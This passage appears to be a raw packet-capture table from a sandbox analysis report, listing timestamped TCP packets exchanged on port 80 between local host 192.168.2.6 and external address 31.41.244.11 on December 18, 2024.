                                                                                                                                                              Dec 18, 2024 11:47:20.024981022 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.024992943 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.025005102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.025023937 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.025049925 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.026321888 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.026335001 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.026345968 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.026369095 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.026390076 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.027487040 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.027529955 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.028225899 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.028268099 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.028553963 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.028597116 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.028624058 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.028656006 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.029733896 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.029776096 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.030121088 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.030159950 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.030869961 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.030908108 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.031047106 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.031090975 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.032427073 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.032439947 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.032469034 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.033216953 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.033258915 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.033436060 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.033477068 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.034472942 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.034485102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.034514904 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.035649061 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.035707951 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.035865068 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.035904884 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.036854029 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.036865950 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.036900997 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.037873030 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.037914038 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.038219929 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.038260937 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.039249897 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.039289951 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.168695927 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.168785095 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.168803930 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.168838978 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.169352055 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.169398069 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.169589043 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.169631958 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.170588970 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.170603991 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.170722961 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.171943903 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.171957970 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.172020912 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.172020912 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.173013926 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.173062086 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.173080921 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.173116922 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.174158096 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.174171925 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.174200058 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.174226999 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.175295115 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.175308943 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.175343037 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.176312923 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.176325083 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.176366091 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.177630901 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.177644014 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.177673101 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.177706003 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.178705931 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.178718090 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.178755999 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.179790974 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.179837942 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.180226088 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.180268049 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.181124926 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.181138039 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.181174994 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.181188107 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.182184935 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.182234049 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.182291031 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.182336092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.183439970 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.183530092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.183561087 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.183607101 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.184454918 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.184506893 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.184711933 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.184757948 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.185666084 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.185714960 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.185776949 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.185837030 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.186945915 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.186995029 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.187002897 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.187072039 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.188191891 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.188247919 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.188663006 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.188735962 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.189181089 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.189223051 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.189232111 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.189269066 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.190505981 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.190520048 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.190548897 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.190577984 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.191596031 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.191608906 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.191648960 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.192728043 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.192778111 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.193727016 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.193777084 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.193917990 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.193964958 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.194431067 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.194478035 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.195045948 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.195095062 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.195355892 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.195400953 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.196569920 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.196624994 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.197036982 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.197082043 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.197648048 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.197693110 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.197757006 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.197798967 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.198560953 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.198612928 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.198669910 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.198853016 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.200401068 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.200449944 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.200632095 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.200674057 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.201111078 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.201123953 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.201155901 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.201169014 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.202749014 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.202761889 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.202799082 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.203350067 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.203403950 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.203432083 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.203475952 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.204530001 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.204543114 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.204580069 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.205617905 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.205665112 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.205939054 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.205985069 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.206716061 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.206763029 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.207273960 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.207340956 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.207897902 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.207938910 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.208925962 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.208972931 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.209031105 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.209088087 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.209182978 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.209239006 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.210215092 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.210261106 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.210810900 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.210856915 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.211739063 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.211751938 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.211824894 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.211824894 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.212635040 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.212708950 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.212723017 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.212763071 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.213720083 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.213767052 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.214174986 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.214217901 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.214864016 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.214910030 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.215331078 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.215377092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.216200113 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.216217995 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.216243982 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.216262102 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.217499971 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.217550993 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.217608929 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.217654943 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.218786955 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.218801022 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.218839884 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.218854904 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.219625950 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.219674110 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.219877005 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.219923973 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.220797062 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.220844030 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.221108913 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.221155882 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.221903086 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.221955061 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.222779036 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.222821951 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.223218918 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.223231077 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.223269939 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.224241018 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.224289894 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.224358082 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.224397898 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.225476027 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.225523949 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.225665092 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.225711107 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.226654053 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.226743937 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.226778984 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.226814985 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.227900982 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.227915049 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.227957010 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.228050947 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.228952885 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.229012012 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.229042053 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.229089022 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.230137110 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.230189085 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.360302925 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.360318899 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.360332012 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.360342979 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.360402107 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.360440969 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.361413956 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.361471891 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.361501932 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.361546040 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.363364935 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.363378048 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.363413095 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.363425970 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.364229918 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.364242077 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.364288092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.365010023 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.365021944 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.365046978 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.365072966 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.367369890 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.367382050 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.367413044 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.367429018 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.367784023 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.367826939 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.368303061 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.368345022 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.368849039 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.368892908 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.369370937 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.369409084 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.371525049 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.371536016 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.371556997 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.371572018 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.373706102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.373718023 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.373745918 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.373763084 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.374087095 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.374136925 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.374237061 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.374342918 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.375133038 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.375171900 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.375325918 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.375369072 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.376669884 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.376682043 CET804980631.41.244.11192.168.2.6
